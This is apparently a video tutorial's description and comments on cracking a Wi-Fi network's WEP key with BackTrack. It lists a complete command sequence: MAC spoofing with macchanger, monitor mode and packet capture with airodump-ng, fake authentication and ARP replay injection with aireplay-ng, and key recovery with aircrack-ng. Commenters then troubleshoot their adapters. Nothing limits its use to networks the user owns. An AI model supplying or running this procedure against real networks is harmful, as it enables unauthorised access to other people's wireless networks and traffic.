This is a step by step video on how to crack a WEP with back track. I'm using a relatively new laptop which means that the nic will actually show as 2 devices, wifi0 and ath0.
Here is a list of commands i used. These will work for any computer, but the wifi0 and ath0 devices may be different
iwconfig
airmon-ng stop ath0 (any/all of them)
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
airodump-ng -c (channel) -w (filename) --bssid (bssid) ath0
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0
aircrack-ng -b (bssid) (filename-01.cap)

hey can someone help me i have the same adapter as the one in the video
i type in airodump-ng ath0 it starts to scan but no wireless networks show up

The method that gives you the best performace, is putting the BT3 or BT4 folder from the disk onto the root directory of your drive. if you're using windows, this is usually your c: drive. Make sure you actually burn the image to the disk..not just put the iso on the disk. Put it in your optical drive and set the bios to boot from cd. You can also boot from a USB drive if you know how to do that and your board supports it.

hay im having some trouble when i put in iwconfig i only see lo and eth0 dose this mean that my wifi card dosen't show up or dose it mean that i need a wifi adapter not a wifi card

You're wifi card is probably not compatible. either try to find the drivers, try using the latest version of Backtrack, or get a cheap little wifi adapter.
